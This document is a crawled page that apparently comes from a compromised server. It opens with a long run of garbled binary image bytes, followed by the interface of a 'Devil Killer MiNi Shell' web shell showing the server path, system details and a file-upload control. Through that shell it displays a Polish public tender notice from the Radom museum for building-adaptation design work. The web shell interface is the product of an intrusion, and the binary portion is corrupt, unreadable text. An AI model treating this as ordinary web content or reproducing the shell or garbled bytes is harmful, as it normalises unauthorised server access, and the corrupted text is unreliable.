JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250401/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250401/0017028101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo- kosztorysowa ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM IM.JACKA MALCZEWSKIEGO W RADOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000592584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48(48) 36-243-29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malczewski@muzeum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo- kosztorysowa ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-32c7c758-9c6a-4906-9038-137001683199</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00170281</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025217/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo-kosztorysowa.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-32c7c758-9c6a-4906-9038-137001683199 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Niniejsze postępowanie prowadzone jest w języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu platformy e-Zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl, oraz poczty elektronicznej:<br/>zamowieniapubliczne@muzeum.edu.pl (z zastrzeżeniem, że składanie ofert odbywa się wyłącznie za pośrednictwem Platformy<br/>e-Zamówienia).<br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont oraz zasady korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz w zakładce &#34;Centrum<br/>Pomocy&#34;.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Dokumenty elektroniczne lub ich cyfrowe odwzorowania muszą być sporządzone zgodnie z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Dokumenty elektroniczne, o których mowa w §2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, należy sporządzać w formatach danych określonych w rozporządzeniu Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności (np. PDF, XML), uwzględniając wymagania przekazywania jako załączniki. Zamawiający<br/>dopuszcza stosowanie podpisów kwalifikowanych, podpisów zaufanych lub podpisów osobistych (zgodnie z przepisami ustawy Pzp).<br/>5. Informacje, oświadczenia lub dokumenty inne niż wymienione w §2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, można przekazywać w postaci elektronicznej:<br/>a. W formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (np.<br/>PDF, XML) jako załączniki,<br/>b. Jako tekst wpisany bezpośrednio w treść wiadomości przesyłanej za pomocą &#34;Formularza do komunikacji&#34;.<br/>6. Dokumenty zawierające informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z 2022 r. poz. 1233 ze zm.) Wykonawca przekazuje w wydzielonym i<br/>odpowiednio oznaczonym pliku.<br/>W nazwie pliku należy umieścić oznaczenie: &#34;Dokument stanowiący tajemnicę przedsiębiorstwa&#34;.<br/>7. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce &#34;Formularze&#34; na Platformie e-Zamówienia. Formularze te umożliwiają przekazywanie<br/>załączników (np. &#34;dodaj załącznik&#34;), które muszą być opatrzone wymaganym podpisem elektronicznym.<br/>8. Możliwość korzystania z &#34;Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta &#34;Wykonawcy&#34; na Platformie e-<br/>Zamówienia oraz zalogowania się na niej. Do korzystania z funkcji zadawania pytań dotyczących dokumentacji postępowania<br/>wystarczy posiadanie tzw. konta uproszczonego.<br/>9. Wszystkie wysłane i odebrane wiadomości są widoczne w zakładce &#34;Komunikacja&#34; po zalogowaniu na Platformę e-Zamówienia.<br/>10. Maksymalny rozmiar plików przesyłanych za pośrednictwem formularzy wynosi 25 MB.<br/>W przypadku większych plików należy podzielić je na części i przesłać w kilku wiadomościach.<br/>11. Minimalne wymagania techniczne sprzętu oraz specyfikacja połączenia są określone w Regulaminie Platformy e-Zamówienia,<br/>dostępnym na stronie https://ezamowienia.gov.pl.<br/>12. W przypadku problemów technicznych związanych z funkcjonowaniem Platformy e-Zamówienia, użytkownicy mogą zgłaszać<br/>problemy za pomocą formularza dostępnego na stronie internetowej w zakładce &#34;Zgłoś problem&#34; lub kontaktować się bezpośrednio z<br/>pomocą techniczną Platformy.<br/>13. W szczególnie uzasadnionych przypadkach, gdy komunikacja za pośrednictwem Platformy e-Zamówienia jest niemożliwa,<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: zamowieniapubliczne@muzeum.edu.pl (z<br/>wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Muzeum im. Jacka Malczewskiego<br/>w Radomiu z siedzibą w Radomiu, ul. Rynek 11, 26-600 Radom, dane kontaktowe Inspektora ochrony danych osobowych e-mail:<br/>iodo@muzeum.edu.pl, tel. (48) 362 21 14 wew.126.<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>3. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp, z tym, że udostępnienie danych, o których mowa w art. 10 RODO, może<br/>nastąpić w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu<br/>ich wniesienia.<br/>4. Pani/Pana dane osobowe będą przechowywane do zgodnie z kategorią archiwalną akt B5, przez okres 5 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia.<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>7. Posiada Pani/Pan:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, z zastrzeżeniem art. 75 ustawy Pzp ,<br/>– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych z zastrzeżeniem art. 19 ust. 2 i art. 76 ustawy<br/>Pzp ,<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO , oraz art. 19 ust. 3 ustawy Pzp ,<br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MJM-ZP.26.4-U-2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest kompleksowe opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej, obejmującej m.in.:<br/>•	Opracowanie trzywariantowej koncepcji projektowej z wizualizacją;<br/>•	Inwentaryzację uzbrojenia terenu, inwentaryzację obiektów;<br/>•	Sporządzenie opinii mikologicznej;<br/>•	Uzyskanie mapy do celów projektowych;<br/>•	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego (jeżeli dotyczy);<br/>•	Opracowanie projektu budowlanego w tym projektów: architektoniczno-budowlanego, zagospodarowania terenu, technicznego wraz z uzyskaniem niezbędnych pozwoleń, w tym pozwolenia na budowę;<br/>•	Opracowanie projektów wykonawczych branżowych,<br/>•	Uzyskanie stosownych uzgodnień i warunków przyłączeń wszystkich mediów niezbędnych do funkcjonowania obiektów, <br/>•	Opracowanie Programu Prac Konserwatorskich zgodnie z wytycznymi MWKZ oraz pozwoleń wymaganych przepisami prawa, w tym pozwolenia Mazowieckiego Wojewódzkiego Konserwatora Zabytków;<br/>•	Wykonanie przedmiarów, kosztorysów inwestorskich oraz Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych, Planu Bezpieczeństwa i ochrony Zdrowia(jeżeli dotyczy);<br/>•	Uwzględnienie w projektowanej dokumentacji projektowo-kosztorysowej badań archeologicznych w obiektach zgodnie z wymaganiami MWKZ./ przeprowadzenie badań archeologicznych nie wchodzi w zakres zamówienia, przeprowadzone one będą na etapie realizacji robót budowlanych. Wykonawca dokumentacji projektowo kosztorysowej ma je tylko uwzględnić w dokumentacji/.<br/>•	Pełnienie nadzoru autorskiego podczas realizacji inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71245000-7 - Plany zatwierdzające, rysunki robocze i specyfikacje</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena za nadzór autorski</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wskazanej do pełnienia funkcji architekta wiodącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolności technicznej lub zawodowej:<br/>Warunek I<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwa<br/>opracowania wielobranżowej dokumentacji projektowej w zakresie budowy, przebudowy lub remontu budynków o<br/>powierzchni użytkowej co najmniej 2 000 m² każdy.<br/>UWAGA:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi zostać spełniony w całości<br/>przez co najmniej jednego z nich. Zamawiający nie dopuszcza sumowania doświadczenia pomiędzy Wykonawcami w tym<br/>zakresie. Analogiczne zasady dotyczą braku możliwości sumowania doświadczenia przy poleganiu na zasobach innych<br/>podmiotów.<br/>Warunek II<br/>Wykonawca musi wykazać, że w celu realizacji zamówienia dysponuje lub będzie dysponował osobami, które będą<br/>skierowane do realizacji zamówienia i posiadają kwalifikacje zawodowe, doświadczenie oraz wykształcenie odpowiednie do<br/>pełnionej funkcji. W szczególności:<br/>a) Jedna osoba pełniąca funkcję architekta prowadzącego, która wykonała w okresie ostatnich 3 lat co najmniej dwa zadania<br/>polegające na opracowaniu projektu budowlanego dotyczącego budowy, przebudowy lub remontu budynku wpisanego do<br/>rejestru zabytków oraz posiada uprawnienia architektoniczne bez ograniczeń. Zamówienia te muszą być zakończone<br/>uzyskaniem prawomocnej decyzji o pozwoleniu na budowę.<br/>b) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej.<br/>c) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>d) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych i kanalizacyjnych.<br/>e) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych.<br/>UWAGA:<br/>Zamawiający wymaga, aby doświadczenie architekta prowadzącego było dokumentowane w sposób umożliwiający ocenę w<br/>ramach kryteriów oceny ofert. Wykonawcy ubiegający się o dodatkowe punkty w tym kryterium powinni załączyć odpowiedni<br/>formularz zgodny z załącznikiem nr 2 do SWZ.<br/>2. Wykorzystanie zasobów podmiotów trzecich:<br/>Stosownie do art. 118 ustawy Pzp, Wykonawca może polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej innych podmiotów, pod warunkiem, że wykaże rzeczywisty dostęp do tych zasobów i ich<br/>wykorzystanie w trakcie realizacji zamówienia. W tym celu należy złożyć zobowiązanie podmiotu udostępniającego zasoby<br/>zgodnie z załącznikiem nr 7 do SWZ.<br/>3. Solidarna odpowiedzialność:<br/>Wykonawca polegający na zasobach innych podmiotów odpowiada solidarnie z tymi podmiotami za szkody wynikłe z<br/>niewykonania lub nienależytego wykonania zobowiązań.<br/>4. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>Wykonawcy wspólnie ubiegający się o zamówienie powinni załączyć oświadczenie o podziale zadań między<br/>poszczególnymi członkami konsorcjum (załącznik nr 8 do SWZ). Zamawiający może zwrócić się o wyjaśnienia dotyczące<br/>faktycznego zakresu wykonywanych zadań.<br/>5. Dokumentacja potwierdzająca spełnienie warunków:<br/>Wykonawca powinien załączyć dokumenty, takie jak referencje, umowy, protokoły odbioru, które potwierdzą spełnienie<br/>warunków udziału w postępowaniu. Zamawiający zaakceptuje wyłącznie dokumenty odnoszące się do zrealizowanych<br/>zamówień zgodnych z wymaganiami SWZ.<br/>6. Ograniczenia w późniejszym powoływaniu się na podmioty trzecie:<br/>Wykonawca nie może powoływać się na zdolności lub sytuację podmiotów trzecich, jeśli nie zostały one wskazane w<br/>ofercie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy<br/>o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z<br/>postępowania, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 7, 8, 10 ustawy Pzp oraz z przesłanek o których mowa<br/>w art. 7 ust. 1 ustawy z dnia 13 